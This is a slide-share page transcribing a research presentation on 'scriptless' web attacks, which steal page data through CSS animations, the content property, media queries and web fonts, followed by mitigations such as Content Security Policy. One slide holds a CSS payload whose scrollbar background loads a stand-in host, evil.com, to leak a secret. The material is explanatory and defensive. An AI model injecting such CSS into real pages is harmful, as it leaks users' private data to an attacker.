Upload
lakia
View
38
Download
0
Tags:
Embed Size (px)
DESCRIPTION
Script less Attacks. Stealing the Pie Without Touching the Sill. Background. XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking. - PowerPoint PPT Presentation
Citation preview
SCRIPT LESS ATTACKSSTEALING THE PIE WITHOUT TOUCHING THE SILL
BACKGROUND
• XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking.
• As popular applications like Skype, Outlook, Thunderbird, Windows 8 are using HTML, security extensions like NoScript are being used by users.
• Given all these defense strategies, we expect that attackers will thrive towards developing “Scriptless Attacks” which achieve same goal as XSS attacks without using any scripting.
BEYOND SCRIPT-BASED ATTACKS• Assumptions:
• The attacker can inject arbitrary data into the DOM rendered by the browser
• We assume that scripting is completely disabled
• The following browser features to be useful building blocks in constructing attacks
- Web-fonts based on SVG and WOFF• Attacker employ these fonts and utilize their
features to vary the properties of displayed website content.
ATTACK COMPONENTS
• CSS-based Animations• With CSS based animations, it is possible to over time
change a wide range of CSS and DOM properties without using any script code
• The CSS Content Property• CSS allows to use a property called content to extract
arbitrary attribute values and display the value either before, after, or instead of the selected element
• CSS Media Queries
<style type="text/css">
@media screen and (min -width: 401px){
*{ background:green;}
body:after{content:’larger view -port’}
}
@media screen and (max -width: 400px) {
*{ background:red;}
body:after{content:’smaller view -port’ }
}
</style >
a[href^=http://]:after{content:attr(href)}
MEASUREMENT-BASED CONTENT EXFILTRATION- USING SMART SCROLLBARS
• To enable a purely CSS-based data exfiltration attack, we utilize all of the available features listed in above section.
<div id="s">secret </div >
<style type="text/css">
div#s::-webkit -scrollbar -track -piece
:vertical:increment {
background:red url(// evil.com?s); }
</style >
• To mitigate this attack,• it is recommended to treat scrollbar backgrounds and
scrollbar state backgrounds equally;
• all background images and similar external resources should be loaded during page-load and not on appearance or state occurrence.
MITIGATION TECHNIQUES• We conclude that several layers of protection are necessary to
effectively and holistically defend against CSS-, SVG- and HTML-based data leakage
1. Content Security Policy (CSP)
2. Detecting Detached Views
3. Miscellaneous Defense Techniques
Conclusion :
While the attacks discussed in this paper presumably do not represent the entirety of ways to illegitimately retrieve sensitive user-data, we believe that the attack components discussed in this paper are of great importance to other attack vectors.